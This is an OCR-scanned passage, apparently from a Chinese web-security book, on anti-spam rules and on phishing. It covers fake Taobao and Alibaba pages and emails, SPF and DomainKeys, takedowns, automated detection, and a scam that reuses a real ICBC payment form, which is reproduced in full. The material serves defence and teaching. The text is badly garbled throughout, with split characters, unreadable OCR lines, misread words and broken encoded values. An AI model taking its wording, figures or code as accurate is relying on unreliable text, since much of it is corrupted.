因为 相对 于 骗子 所 获得 的 高 回报 来 说 ， 这 些 雇 佣 成 本 几乎 可 以 急 略 不 
计 。“ 批 量 *>、“ 自 动 化 ”的 特点 意味 着 : 

(1) 同一 客户 端 会 多 次 请 求 同 样 的 URL 地 址 ，; 

页 面 与 页 面 之 间 的 跳 转 流程 可 能 会 不 正常 (页面 1- 页 面 3， 不 像 
ona 

一 客户 端 两 次 请 求 之 间 的 时 间 间 隔 短 ; 

有 时 客户 Hi JUserA gent £i EAA VB Vias ; 

客户 端 可 能 无 法 解析 JavaScript 和 Flash; 

在 大 多 数 情 况 下 验证 码 是 有 效 的 。 


FBI AY BG 轧 的 内 容 去 分 机 ， 驻 可 以 发 现 很 多 不 同 的 


注册 时 填写 写 的 用 户 名 可 能 站 随机 生成 的 字符 串 ， 而 非 目 然 语 言 ; 
MIRKE BERT 绍 可 能 出 现 同样 的 内 容 ， 在 需要 打 广 告 时 尤其 


可 能 含有 一 些 敏感 词 ， 比 如 政治 敏感 词 和 商业 广告 词 ; 
可 能 出 现 文字 的 变形 ， 比 如 把 半角 变 全 角 ， 或 者 类 似 地 把 “ 强 ” 拆 


( 
正常 
(3 
( 
( 
( 
如 
特点 
( 
( 
rH 


x 
pe E ee Ne 


末 与 业务 相 结 合 的话 ， 还 能 挖 抉 出 更 多 的 特征 ， 比 如 在 IM 里 : 


1) 如 果 某 个 用 户 给 许多 不 同 用 户 发 送 消息 ， 但 接收 者 都 不 回 消息 的 
Tah, Ih AB) BERL ETE IRDA; 

(2) 如 果 某 个 用 户 加 入 不 同 的 IM 群 后 ， 发 送 的 消息 总 是 同样 的 内 容 ， 
不 说 其 他 话 ， 则 可 能 也 是 在 发 送 垃圾 消息 。 
有 了 这 些 特征 ， 就 可 以 依 此 建立 规则 和 模型 。 
规则 系统 比较 简单 ， ZAR BUR S 3T n] ARE ALS RE ARTI BUR < 在 垃圾 
识别 或 者 Anti-Spam 领 域 里 ， 被 广泛 应 用 的 方法 是 “机 研学 习 ” 
想 要 实现 一 个 优秀 的 垃圾 识别 算法 ， 需 要 算法 专家 与 业务 专家 一 起 合 
作 ， 这 是 一 个 需要 不 断 改进 的 过 程 。 目前 并 没有 一 个 万 能 的 算法 能 一 
次 解决 问题 。 与 业务 相关 的 系统 ， 必 然 是 在 不 断 的 诡 厅 中 成 长 。 今 天 
许多 大 型 互联 网 公司 都 组 建 了 自己 的 商业 智能 团队 来 做 这 些 事 情 。 在 
本 书 中 ， 不 深 谈 此 类 算法 的 实现 细 ;。 
如 果 仔 细 分 析 垃 圾 行为 特征 ， 可 以 大 致 分 成 : 内容 的 特征 、 行 为 的 特 
c Ae PX AN ARIE 9 MOX TZPBDAGR, a A E A RISE 
JUS 


( 
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基于 内 容 的 规则 : 以 目 然 语言 分 析 、 关 键 词 匹配 等 为 代表 。 

基于 行为 的 规则 : 以 业务 逻辑 规则 为 代表 。 

基于 客户 端 识 别 的 规则 : 以 人 机 识别 为 代表 ， 比 如 验证 码 ， 或 者 
让 客户 端 去 解析 JavaScript。 


三 种 规则 配合 使 用 ， 能 够 起 到 较 好 的 效果 ， 最 终 可 以 建立 一 个 比较 完 
善 的 风险 控制 系统 一 一 在 事 中 监控 并 拦截 高 风险 的 用 户 行为 ;在 事后 
追溯 恶意 用 户 ， 取 证 、 统 计 损 失 ， 并 可 以 为 决策 提供 依据 。 

识别 出 非法 用 户 和 非法 行为 后 ， 在 “拦截 * 上 也 需要 讲究 策略 和 战术 。 
因为 很 多 时 候 ， 规 则 都 是 “ 见 光 死 *， 规 则 的 祭 窗 性 非常 重要 。 如 采 使 
用 规则 和 和 亚 意 用 户 做 直接 对 抗 ， 那 么 规则 的 内 容 很 容易 暴露 ， 导 致 规 
则 很 快 会 被 绕 过 。 因 此 要 有 技巧 地 保护 规则 。 

如 何 保护 呢 ? 以 “拦截 ?来 说 ， 如 果 不 是 特别 紧急 的 业务 ， 则 可 以 打 一 
个 时 间 兰 。 当 使 用 规则 识别 出 垃圾 账户 后 ， 过 一 段 时 间 再 做 处 理 ， 这 
样 恶 意 用 户 就 摸 不 准 到 底 触 犯 了 哪 条 规则 。 同 时 还 可 以 “打压 ”大 部 分 
账户 ， 放 过 一 小 批 账户 。 这 样 既 控 制 住 大 部 分 的 风险 ， 又 让 风险 不 会 
随意 转移 ， 可 以 一 直 把 可 探 的 风险 放 在 明 处 。 这 样 从 防御 的 角度 看 ， 

束 能 掌握 主动 权 。 

与 垃圾 注册 和 垃圾 信息 的 对 抗 最 终 还 是 会 升级 。 作 为 安全 团队 ， 需 要 
汉 跟 敌人 的 变化 ， 走 在 敌人 的 前 面 。 


165 “关于 网 络 钓鱼 

在 今天 的 互联 网 中 ， 钓 鱼 与 欺诈 问题 已 经 成 为 一 个 最 严重 的 威胁 。 在 
金山 网 络 安全 中 心 发 布 的 《2010 年 中 国 网络 购 物 安全 报告 》 中 指出 ， 
有 超过 1 亿 用 户 遭 遇 过 网 购 陷阱 ， 直 接 经 济 损失 将 突破 150 亿 元 。 而 中 
国 的 网 民 在 2011 年 才刚 刚 突破 4 亿 。 在 这 样 恶劣 的 环境 下 ， 如 何 对 抗 钓 
鱼 问题 ， 就 显得 尤为 重要 了 。 

16.5.1 钓鱼 网 站 简介 

很 多 站 长 都 会 觉得 很 无 率 : “是 钓鱼 网 站 模仿 了 我 的 网 页 ， 又 不 是 我 的 
网 站 出 现 了 漏洞 *、“ 用 户 上 当 ， 是 因为 用 户 傻 ”。 

很 多 时 候 ， 钓 鱼网 站 确实 不 是 网 站 的 主要 责任 。 但 是 问题 既然 发 生 
了 ， 光 抱怨 是 没有 用 的 ， 最 终 受 到 伤害 的 还 是 网 站 的 用 户 。 所 以 ， 网 
站 可 以 主动 承担 更 大 的 责任 ， 尽 可 能 地 处 理 网 络 钓 鱼 问题 。 

在 互联 网 安全 中 ， 网 络 钓鱼 问题 是 至 今 都 难以 根治 的 一 个 难题 。 它 难 
就 难 在 欺诈 过 程 中 ， 利 用 了 许多 人 性 的 弱点 ， 或 以 利诱 ， 或 以 障 眼 
法 。 网 络 钓 鱼 问题 并 不 完全 是 一 个 技术 问题 ， 单 纯 从 技术 的 层面 去 解 
决 ， 很 难 根治 。 

在 今天 ， 网 络 钓鱼 已 经 像 挂 马 一 样 ， 形 成 了 一 个 产业 链 。 这 个 产业 链 
中 分 工 明确 : 有 人 制作 并 销售 生成 钓鱼 网 站 的 程序 ， 有 人 负责 在 邮 
人 


根据 中 国 反 钓鱼 联盟 的 统计 ， 网 络 钓鱼 大 多 集中 在 网 络 购物 、 网 上 银 
行 等 行业 。 下 图 是 2011 年 4 月 份 的 钓鱼 网 站 行业 分 布 统计 。 

在 网 上 文 付 行 业 中 产生 的 网 络 和 钓鱼， 有 机 会 让 骗子 直接 骗取 用 户 的 钱 
财 ， 所 以 是 网 络 钓鱼 的 重 灾区 。 淘 至 网 是 目前 中 国 最 大 的 电子 商务 网 
站 ， 占 据 了 中 国 网 购 市 场 的 半壁 江山 。 因 此 ， 模 仿 淘 宝 网 的 钓鱼 网 站 


非常 多 。 


电子 邮箱 类 
其 他 ”媒体 传播 类 


0.83% 
0 Wh y 
m 旅游 酒店 类 
0.11% 


2.39% 
即时 通讯 类 
4.29% 


金融 证 券 类 
11.08% 


文 付 交 易 类 
79.35% 


钓鱼 网 站 行业 分 类 统计 
根据 中 国 反 钓鱼 联盟 在 2011 年 4 月 份 的 统计 数据 ， 可 以 看 出 淘 至 网 的 钓 
鱼网 站 是 目前 国内 钓鱼 网 站 的 主流 。 


央视 SNR 中国 银行 
1.5996 | 


腾讯 
4.29% " 


5.2896 


钓鱼 网 站 模仿 目标 站 点 统计 

在 国外 ， 钓 鱼网 站 (Phishing) 的 定义 是 页 面 中 包含 了 登录 表单 的 网 
站 ， 此 类 网 站 的 目的 是 统 取 用 户 的 密码 。 

但 是 随 痢 网 络 犯 徘 手 段 的 多 样 化 ， 很 多 钓鱼 网 站 开始 模仿 登 示 页 面 之 
外 的 页 面 ， 目 标 也 不 仅仅 古 位 蛙 的 骗取 密码 。 此 类 钓鱼 网 站 可 以 称 
为 “欺诈 网 站 ”， 也 可 以 认为 是 广义 的 钓鱼 网 站 ， 因 为 它们 都 是 以 模仿 
和 
yb? o 


以 淘宝 网 的 钓鱼 网 站 为 例 ， 正 第 的 淘宝 网 登录 页 面 如 下 : 


B https://login. taobao. con/nenber/1ogin. jhtnl ?f=topkredirectURL=httph3Ah2FN2Fwww, taobao contizFindex. global. php 


淘 宇 网 


淘宝 会 员 支付 宝 会 员 


账户 名 “手机 号 /会 员 名 /邮箱 


cif ——— 
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淘宝 开店 时 间 : 3 年 


E 使 用 动态 密码 | 免费 注册 


已 经 购 习 过 的 访客 SER 


手机 登录 mm,taobao,com, 随时 随地 购物 


而 伪造 的 淘宝 网 钓鱼 网 站 则 如 下 : 


X | iten. tacbao-con-i te. cz. cc/nenber/login. jhtnl f top. Asp?ucadnin 


淘 宇 网 


sies 
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FAEN. taobao.com, 随时 随地 购物 


B RETE ae 
注意 钓鱼 网 站 的 URL 是 : 


http://item.taobao-com-ite.cz.cc/member/ 
login.jhtml f top.Asp?u-admin 


a HLA HE VS 3m H 


一 些 经 验 不 是 很 丰富 的 用 户 ， 可 能 就 分 辨 不 出 来 网 站 的 真实 性 ， 有 时 
候 甚 至 一 些 老 网 民 也 会 因为 粗心 大 意 而 上 当 。 令 人 吃惊 的 是 ， 笔 者 接 
触 到 的 许多 因为 钓鱼 网 站 而 被 盗 的 案件 中 ， 用 户 强 调 目 己 能 分 辨 钓鱼 
网 站 ， 但 真相 是 往往 用 户 自 己 并 不 知道 曾经 访问 了 钓鱼 网 站 。 

从 传播 途径 上 来 说 ， 钩 鱼网 站 并 非 无 迹 可 寻 。 

骗子 总 古 希 望 能 够 骗 到 更 多 的 人 ， 他 们 也 有 目标 客户 。 比 如 ， 如 采 是 
饥 取 用 户 购 天 游戏 总 卡 的 ， 则 很 有 可 能 会 在 网 络 游戏 的 公共 频道 中 “ 喊 
话 ”。 此外，IM 和 邮箱 也 是 钓鱼 网 站 传播 的 主要 途径 。 淘 宝 网 上 的 购物 


有 自己 的 IM ”淘宝 旺旺 ， 在 旺旺 上 传播 的 钓鱼 网 站 一 般 是 模仿 淘宝 
网 的 钓鱼 网 站 ; 而 在 QQ 上 ， 更 多 的 是 传播 拍 拍 与 财 付 通 的 钓鱼 网 站 。 
但 这 个 趋势 并 非 绝对 ， 需 要 看 具体 情况 。 

16.5.2 ”邮件 钓鱼 

钓鱼 邮件 ， 是 垃圾 邮件 的 一 种 ， 它 比 广告 邮件 更 有 针对 性 。 

令 人 比较 无 奈 的 是 ，SMTP 协 议 是 可 以 由 用 户 伪 造 发 件 人 邮箱 的 。 而 在 
AT oa 如 果 没 有 实施 相关 的 安全 策略 ， 则 无 从 识别 发 件 人 邮 
THE] EST ° 

gis APA 注意 邮件 的 发 送 者 被 伪造 成 真实 的 邮箱 地 
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伪造 的 Alibaba 发 件 人 邮箱 
在 邮件 正文 中 ， 则 诱骗 用 户 到 一 个 伪造 的 钓鱼 网 站 。 
| Alibaba.com Account service 


During our regular scheduled maintenance of our systems, your account was flagged for 
having a long period of inactivity 


For security reasons, inactive accoun i j 
To prevent this from occurring, yo Te E NE E R) 
link provided below ^ 


—_— with the 


To access your account: 
click here to reconfirm your account or use the below link 


if the above link doesntwork click here 


http /"www.alibaba.com/reconfirm/securitv/access/ 


regards 


Alibaba Team 


含 钓鱼 网 站 的 邮件 正文 
前 有 许多 识别 发 件 人 邮箱 的 安全 技术 ， 大 部 分 都 是 基于 域名 策略 
的 ， 比 如 SPF (Sender PolicyFramework) 、Yahoo 的 DomainKeys、 微 软 
的 Sender ID 技 术 等 。 
Yahooff)DomainKeys A 生成 一 对 公私 钥 。 公 钥 布 署 在 收 信 方 的 DNS 服务 
器 上 ， 用 于 解密 ， 私 钥 则 用 于 发 信 方 的 邮件 服务 器 ， 对 发 出 的 每 封 邮 


件 进 行 答 名。 这样 收 信 方 在 收 信 时 ， 到 DNS 服务 器 上 查询 属于 发 信 方 
0 5 
SPF 技 术 与 DomainKeys 不 同 ，SPF 是 基于 IP 策 略 的 ， 有 点 类 似 于 DNS 反 
向 解析 。 收 信 方 在 接收 到 邮件 时 ， 会 去 DNS 查询 发 信 方 域 的 SPF 记 录 。 
这 个 记录 写 着 发 信 方 邮件 服务 器 和 IP 的 对 应 关系 ， 检 查 了 这 个 记录 
mu UAE EUG SUMUNTUR SUO UE 
微软 的 Sender ID 技术 ， 是 以 SPE 为 基础 的 。 

但 是 ， 这 三 种 技术 在 今天 都 面临 一 个 很 大 的 推广 难题 。DomainKeys 尤 
其 复杂 ， 它 是 在 原本 的 标准 邮件 协议 上 多 出 了 一 个 扩展 ;同时 加 /解密 
对 服务 器 性 能 的 影响 比较 大 ， 在 处 理 海 量 数据 时 ， 容 易 形 成 瓶颈 ， 配 
置 与 维护 上 的 困难 也 会 让 很 多 邮件 服务 商 望 而 止步 。 

SPF 相 比 于 DomainKeys 来 说 更 易于 配置 ， 只 需要 收 信 方 单方 面 在 DNS 
中 配置 即 可 。 但 是 SPEF 是 针对 IP 和 域名 的 策略 ， 难 以 覆盖 到 互联 网 上 的 
所 有 网 站 。 各 大 邮件 运营 商 的 SPF 策 略 又 各 不 相同 ， 使 得 骗子 有 很 多 空 
子 可 以 钻 。 而 基于 IP 的 策略 ， 一 旦 写 死 ， 维 护 起 来 也 是 一 件 非常 痛苦 
的 事情 。 这 意味 着 发 信 方 域 的 邮件 服务 器 了 不 能 做 较 大 的 变化 一 一 一 
旦 IP 变 化 了 ，SPF 策 略 却 未 及 时 更 新 ， 就 可 能 会 造成 大 面积 误杀 。 

但 是 在 今天 ，SPF 仍 然 成 为 对 抗 “ 邮 件 地 址 伪造 ”的 一 项 主要 技术 ， 在 没 
有 更 好 的 技术 出 现时 ， 只 能 选择 去 推广 SPF 。 

16.5.3 ”钓鱼 网 站 的 防 控 

钓鱼 网 站 的 防 控 是 一 件 很 有 挑战 的 事情 。 尤 其 是 现在 互联 网 整体 环境 
比较 恶劣 ， 在 此 方面 的 基础 建设 远 远 不 足 的 情况 下 ， 很 可 能 会 面临 投 
入 大 、 产 出 小 的 赛 境 。 但 是 钓鱼 网 站 的 防 控 是 必须 要 做 的 事情 ， 一 步 
步 改善 环境 ， 总 能 迎 来 最 后 的 胜利 。 

前 文 谈 到 了 和 钓鱼 网 站 的 传播 途径 ， 主 要 集中 在 邮箱 、IM 等 处 。 根 据 网 
站 业务 的 差异 ， 在 评论 、 博 客 、 论 坛 等 处 也 可 能 会 存在 钓鱼 链接 ， 时 
下 非常 热门 的 SNS 和 微 博 ， 也 可 能 会 成 为 钓鱼 网 站 传播 的 主要 途径 之 


16.5.3.1 ”控制 钓鱼 网 站 传播 途径 

控制 钓鱼 网 站 传播 的 途径 ， 就 能 对 钓鱼 网 站 实施 有 效 的 打击 。 

一 个 网 站 如 果 有 IM、 邮 箱 等 互联 网 基础 服务 的 业务 ， 则 可 以 利用 自 有 
资源 对 用 户 产 生 的 内 容 进行 控制 ， 检 查 其 中 是 否 包 含 钓 鱼网 站 ， 尤 其 
在 一 些 “ 用 户 与 用 户 之 间 交 互 ”比较 多 的 地 方 。 


但 钓鱼 网 站 也 有 可 能 在 “站 外 传播 >。 目 前 很 多 网 站 是 没有 目 己 的 邮箱 
服务 的 ， 用 户 注册 时 使 用 的 邮箱 由 第 三 方 邮 件 运 香 商 提供 ， 比 如 
Gmail、Ya-hoo Mail 等 。 如 果 和 钓鱼 邮件 发 送 到 这 些 用 户 邮箱 中 ， 就 脱离 
了 网 站 本 身 的 范畴 。 

网 络 钓鱼 是 需要 整个 互联 网 共同 协作 解决 的 一 个 问题 ， 因 此 当 钓 鱼 传 
播 途径 脱离 了 目标 网 站 本 身 的 范畴 时 ， 应 该 积极 地 通过 与 外 部 合作 的 
方式 ， 共 建 一 个 安全 的 大 环境 ， 也 就 是 建立 一 个 反 钩 鱼 的 统一 战线 。 

目前 很 多 大 的 互联 网 公司 都 已 经 意识 到 统一 战线 的 重要 性 ， 这 条 反 钓 
鱼 的 统一 战线 已 经 初 具 规模 ， 网 站 、 互 联网 基础 服务 、 浏 览 磊 厂商 、 
反 病 毒 厂 商 、 银 行 、 政 府 都 成 为 这 条 战线 的 成 员 。 

浏 训 夯 是 一 个 较为 特殊 的 环 丰 ， 因 为 浏览 磺 是 互联 网 的 入 口 ， 钓 鱼网 


所 以 在 浏 哎 右 中 拦截 钓鱼 网 站 ， 能 事半功倍 。 下 图 是 Chrome 拦 截 到 钓 
鱼网 站 并 发 出 报警 。 


C alibaba, onlineaccountactivation hccreative. ca 


警告 ， DO Boe ES E! 
PRAES alibaba.onlineaccountactivation.hccreative.ca APACER A PLR Min SARA eS aR ae TS EN 
机 构 ， 骗 取 用 户 的 个 人 信息 或 财务 信息 。 


如 果 您 认为 自己 了 解 沈 些 风险 ， 风 可 以 仍 拓 继续 。 


浏览 器 与 杀毒 软件 在 反 钓鱼 方面 面临 的 问题 ， 就 是 软件 的 用 户 履 盖 
率 ， 以 及 钓鱼 网 址 信息 的 互通 与 共享 。 


只 有 当 不 同 的 浏览 器 厂商 、 杀 毒 软件 厂商 能 够 及 时 同步 钓鱼 网 址 的 黑 
名 单 时 ， 才 能 完善 这 道 最 终 的 防线 © 

钓鱼 网 站 的 黑 名 单 ， 可 以 成 为 一 个 公共 信息 公布 在 互联 网 上 ， 任 何 浏 
览 器 和 反 病 毒 厂商 都 可 以 使 用 这 些 黑 名 单 。Google 公 开 了 一 个 “Safe 
Brows-ing API”, “ fi T Google A HAY ix #2 HE BPA Gk o iB wt “Safe 
Browsing APP， 可 以 获取 钓鱼 网 址 、 挂 马 网 址 、 诈 骗 网 址 的 黑 名 单 。 
16.5.3.2 直接 打击 钓鱼 网 站 

在 钓鱼 网 站 的 防 控 中 ， 还 有 一 个 有 力 的 措施 ， 就 是 关 停 站 点 。 

很 多 DNS 运营 商 、IDC 运 草 商 目前 都 开始 提供 站 点 关 停 的 业务 。 可 是 运 
营 商 本 身 无 法 识别 一 个 网 址 是 否 是 钓鱼 网 站 ， 因 此 很 多 运营 商 依靠 一 
A A 
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安全 公司 发 起 的 “ 关 停 恶意 网 址 要 求 ” 目 前 已 经 变 成 一 项 生意 ， 网 站 可 
以 购买 相关 的 服务 以 对 自身 品牌 进行 保护 。 关 停 包 括 对 域名 的 关 停 ， 
以 及 对 虚拟 主机 上 应 用 的 关 停 。 

在 国外 ，RSA、Mark Monitor ` NetCraft 等 公司 均 开展 了 相关 业务 ， 站 
点 关 停 的 响应 时 间 最 快 可 以 控制 在 数 个 小 时 之 内 ; 在 国内 ， 主 要 是 通 
的 反 钓 鱼 联盟 (APAC) ， 对 “cn 的 域名 和 主机 进行 关 
学 o 

随 着 中 国 对 运营 商 监 管 的 力度 越 来 越 大 ， 以 及 为 了 规避 某 些 法 律 风 险 
和 增加 追查 难度 ， 越 来 越 多 的 钓鱼 网 站 开始 转移 到 国外 的 运营 商 。 经 
过 调查 发 现 ， 大 多 数 钓鱼 网 站 选择 了 美国 和 韩国 的 运营 商 。 

目前 中 国法 律 方面 对 网 络 犯罪 的 相关 条 例 尚 不 完善 。 以 往 的 网 络 犯罪 
案件 ， 仍 然 是 使 用 传统 法 律 条 款 进 行 解 释 。“ 盗 窃 罪 ?和 “诈骗 罪 ? 是 网 络 
犯罪 案件 中 被 引用 得 最 多 的 条 款 。 

但 是 钓鱼 类 案件 有 其 特殊 性 。 网 络 钓鱼 是 一 种 欺诈 行为 ， 可 以 以 “诈骗 
罪 ” 论 处 。 但 钓鱼 网 站 的 苦 主 可 能 成 千 上 万 ， 每 个 苦 主 的 单 笔 金额 也 许 
不 是 很 多 ， 取 证 和 诉讼 方面 都 会 遇 到 很 大 的 困难 。 而 且 由 于 互联 网 的 
特殊 性 ， 很 多 骗子 都 通过 代理 服务 器 或 者 更 换 卫 地址 的 方式 以 躲避 追 
踪 ， 为 取证 带 来 了 一 定 的 难度 。 

虽然 困难 很 大 ， 但 由 司法 机 关 直 接 对 网 络 钓鱼 行为 进行 打击 ， 是 最 有 
力 的 方法 。 每 当 打 掉 了 一 个 钓鱼 犯罪 团伙 后 ,钓鱼 案 件 总 量 都 会 下 降 
很 多 ， 起 到 了 极 大 的 震慑 作用 。 

16.5.3.3 ”用 户 教 育 


用 户 教 育 永远 是 安全 工作 中 必 不 可 少 的 一 环 。 网 站 需要 告知 用 户 什 么 
是 好 的 ， 什 么 是 坏 的 。 但 是 光 喊 “ 狠 来 了 ”也 是 没 用 的 ， 过 多 的 警告 信 
息 只 会 使 用 户 走失 警惕 性 。 笔 者 曾经 看 过 这 样 的 一 个 案例 :一 个 木马 
在 某 IM 里 传播 ， 很 多 用 户 上 当 受 卵 ， 于 是 该 IM 做 了 一 个 功能 ， 检查 
户 传输 的 文件 是 否 为 .exe 等 可 执行 文件 ， 如 果 是 压缩 包 则 看 压缩 包 里 是 
否 包 含 了 .exe， 如 果 有 则 警告 用 户 这 可 能 是 一 个 木马 。 在 用 户 被 骗 后 举 
报 的 案件 记录 中 ， 看 到 骗子 是 这 样 诱导 用 户 的 :“ 您 用 的 是 最 新 版 本 
pr eS 这 个 版 本 什么 都 报 是 森马。 没事 的 ， 您 点 
nm! 

用 户 教育 的 工作 任 重 而 道 远 。 

16.5.3.4 ”自动 化 识别 钓鱼 网 站 

在 钓鱼 网 站 的 拦截 过 程 中 ， 有 一 个 关键 的 工作 ， 束 是 快速 而 准确 地 识 
别 钓鱼 网 站 。 依 靠 人 工 处 理 钓 鱼网 站 ， 工 作 量 会 非常 大 ， 因 此 有 必要 
使 用 技术 手段 ， 对 钓鱼 网 站 进行 一 些 自动 化 的 识别 。 

目前 许多 安全 公司 都 开始 进行 此 方面 的 研究 ， 并 且 卓 有 成 效 。 

锥 鱼网 站 的 域名 都 具有 一 定 的 欺骗 性 。 但 反 过 来 说 ， 具 有 欺骗 性 ， 也 
就 具有 相似 性 。 比 如 正常 的 淘宝 宝贝 页 面 URL 中 包含 了 参数 值 “-0db2- 
b857a497c356d873h536h26ae7c69”， 这 种 参数 值 几 乎 成 了 淘宝 URL 的 特 
ffi o 


因此 ， 下 面 这 个 钓鱼 网 站 模仿 了 这 种 URL: 


http://item.taobso.comdiz.info/auction/ 
item detail-Odb2- 
b857a497c356d873h536h26ae7c69 
.htm.asp?ai-486 
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在 域名 上 ， 也 有 很 多 字母 变形 。 比 如 将 字母 co 变形 为 数字 "0"， 字 
母 中 与 数字 “1* 互 换 等 方法 ， 都 是 骗子 的 惯用 伎俩 。 

在 页 面 的 源 代 码 中 ， 也 能 分 析出 许多 相似 的 地 方 。 比 如 上 面 的 钓鱼 网 
站 ， 其 页 面 代码 中 就 包含 了 如 下 脚本 

> 

TBMA SBR EE ERTA RRE ED 
下 来 的 ， 这 段 脚本 就 可 以 成 为 一 个 特征 。 


自动 识别 钓鱼 网 站 是 一 项 复杂 的 工作 ， 不 同 的 思路 会 有 不 同 的 结果 。 
同时 这 项 工作 必然 是 在 不 断 的 对 抗 中 成 长 ， 没 有 一 成 不 变 的 规则 和 模 
型 ， 也 没有 一 成 不 变 的 钓鱼 网 站 。 

但 即使 再 精准 的 系统 ， 也 会 有 误 报 的 ， 因 此 最 终 还 是 需要 有 人 工 审 核 
进行 把 关 。 

16.5.4 ”网购 流程 钓鱼 

上 面 展示 的 那个 钓鱼 网 站 ， 和 前 文 提 到 的 登录 页 面 的 钓鱼 不 同 ， 这 是 
一 个 淘宝 宝贝 页 面 的 钓鱼 。 那 么 这 个 钓鱼 网 站 又 是 如 何 行 骗 的 呢 ? E 
下 来 ， 就 要 讲 讲 这 种 比较 奇特 的 诈骗 方式 ， 它 实际 上 利用 了 今天 电子 
A NE T per 
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在 这 个 宝贝 页 面 的 钓鱼 网 站 上 ， 如 果 点 击 * 立 刻 购买 ”>， 则 会 跳出 一 个 
登录 浮 层 ， 它 同时 骗取 了 用 户 的 密码 。 
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输入 一 个 测试 账户 后 ， 就 进入 了 确认 购买 页 面 ， 这 也 是 淘宝 网 购 里 正 
常 流程 会 走 到 的 一 步 。 一 切 看 起 来 都 和 真 的 一 样 ， 除 了 URL © 
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输入 一 个 测试 账户 后 ， 就 进入 了 确认 购买 页 面 ， 这 也 是 淘宝 网 购 里 正 
党 流程 会 走 到 的 一 步 。 一 切 看 起 来 部 和 真 的 一 样 ， 除了 URL ° 
扩 击 “确认 无 识 ， 购 买 "， 将 进入 付款 页 面 。 在 正常 的 淘宝 网 购 流程 


中 ， 是 去 支付 宝 付 球 。 钓 鱼网 站 同时 伪造 了 文 付 宝 的 收银 台 页 面 ， 骗 
取 用 户 的 文 付 密码 。 
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实际 上 用 户 是 不 会 支付 成 功 的 ， 但 此 时 用 户 的 支付 密码 已 经 被 盗 了 。 
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在 此 过 程 中 ， 用 户 的 淘宝 账户 密码 、 支 付 宇 的 文 付 密码 都 已 经 被 钓鱼 
网 站 所 获取 。 用 户 看 到 的 所 有 的 页 面 都 是 钓鱼 网 站 伪造 的 。 
但 这 一 切 并 不 是 最 重要 的 ， 最 重要 的 是 钓鱼 网 站 即使 不 知道 用 户 的 密 
码 ， 也 能 锯 走 用 户 的 线 。 这 涉及 一 个 网 购 流 程 的 设计 缺陷 。 


在 这 个 过 程 中 ， 最 终 钓鱼 Do m EPA — A 
表单 。 查 看 源 代码 可 以 看 到 ， 这 是 一 个 工商 银行 的 支付 表单 。 


<form id="ebankPayForm" name="ebankPayForm" 
target="_blank" method="post" 
action-"https://B2C.icbc.com.cn/servlet/ 
ICBCINBSEBusinessServlet" > 

«input type="hidden" name="interfaceName" 


value-"ICBC PERBANK B2C"/» 

<input type="hidden" name="interfaceVersion" 
value="1.0.0.0"/> 

<input type="hidden" name="orderid" 
value="507148170"/> 

<input type="hidden" name="amount" 
value="985000"/> 

<input type="hidden" name-"curType" 
value="001"/> 

<input type="hidden" name-"merID" 
value="4000EC23359695"/> 

<input type="hidden" name="merAcct" 
value="4000021129200938482"/> 

<input type="hidden" name="verifyJoinFlag" 
value="0"/> 

<input type="hidden" name="notifyType" 
value="HS"/> 

<input type="hidden" name="merURL" 
value="http://bank. yeepay.com/app-merchant - 
proxy/neticbcszrecv.action"/» 

«input type="hidden" name="resultType" 
value="0"/> 

<input type="hidden" name="orderDate" 
value="20110522205936"/> 

<input type="hidden" name="goodsName" 

value=" 中 国联 通 交 费 充 值 "/> 

<input type="hidden" name="merSignMsg" 
value-"fwWXBaBUrgwpxzP5oxyZay70bihJrHt9UkGm9o 
kjRrHH828Kx8b/1kX8hOdS7wv74lgh3rZybkqSL-* 
DpB9F0u24*Pji9CWrGJeN5Y96qd97agv/n802vVp 
+VhKbFcOh6yuSQH4HK6dRxFrz4DsdpqgAr 7ZdpUiM2DgS 
ZjHCQUK0-"/» 

<input type="hidden" name="merCert" 
value="MIIDBDCCAeygAWwIBAgIKYULKEHr kAC49gjANBg 
kghkiG9wOBAQUFADA2MRAWHAYDVQQDExV JQ0 JDIE 
NvcnBvcmFOZSBTdWIgQOEXFDASBgNVBAOTC21 j YnMuY29 
tLmNuMB4XDTEwMDkyNTA3NTUOMLOXDTEXMTAXMDE 
1NTk10VowPzEYMBYGA1UEAxMPeWVlcGF5MDEuZS40MDAw 
MQOwCwY DVQQLEWQOMDAWMRQWEgYDVQQKEwt pY2 J j 
LmNvbS5jbjCcBnzANBgkqhkiG9wOBAQEFAAOB j QAwgYkCg 
YEA1LE1UbpYQd2bW87--hzo/3F9N8A8m30CVUAV j 8 
rYN7g499YwXJtCmvXJpKGHzpsygEvrwDsEWQp2rOFIOnS 
Ayga4VyyVbmFnx3dkiKFpAco6pi-*G2Yvtaxsol80 
IO0ZpBzytRJRDyS3WSZG6mKw3ty5UlbAiNlugJARfcMuYGv 
Q7j SCAWEAAaOBj j CBizAfBgNVHSMEGDAWgBT5yEX 
DU5MmN jGTL5QQ38hTPfZvn;jBJBgNVHR8EQ;j BAMD6gPKAG 
pDgwNj EQMA4GA1UEAXMHY3J SMZAZMTEMMAOGA1UE 
CxMDY3JsMRQwEgYDVQQKEwtpY2J j LmNvbS5j bj AdBgNVH 
Q4EFgQUI-«mwl5mh7sI81gNXua2rcv/nevOwDQYJK 
oZIhvcNAQEFBQADggEBALa J50yxbHP8L sWiyvi//ijREA 
iA60J35hEy6Yn4Y8w7DZwMOH1il7txGOKfGPYU7p 
AQ6A9iQ-wMnMCBMrLOyws10si2JQIWZncs7/ 
AisCXfGlji6wesAUAMCNiAfV2-*nPmr2SMpkhakO00IcOZl 
ZHqN 

PeTBcTIuPmR3tH3UAJnC5vaz-*7/Y 
*veEXa2PDia//TT2GCsaV3UP3mf dHFzGKVYIIZJOqGJFN 
4nBDqF1aYXgG 

Bawf JWUVDIIJBnv94K9kj4u7saciEicl3AwkPJdrhWY/ 
Y5SZuulipckfiserbSoGEKDCQ30D9HOSVFIMpJi7n 
kwP56xhr Jw8mQ1UggGAgGE-"/» 

<input type="hidden" name="remarki" 
value="0"/> 

<input type="hidden" name="remark2" 
value="0"/> 

</form> 


JX SPB A fe ROUTE: 


action=https://B2C.icbc.com.cn/servlet/ 
ICBCINBSEBusinessServlet 


iia 商 银行 付款 地 址 。 也 吏 是 讽 ， 这 个 表单 是 真实 存在 
y! 
再 看 看 这 个 表单 中 的 儿 个 关键 参数 : 


name-"orderid" value-"507148170"  i[/É5 
name-"merID" value="4000EC23359695" ”商户 标识 
name-"merAcct" value-"4000021129200938482" 商户 标识 
name-"merURL" value-http://bank.yeepay.com/ 
app-merchant-proxy/neticbcszrecv.action 商户 URL 
name="goodsName" value=" 中 国联 通 交 费 充值 " 品名 称 


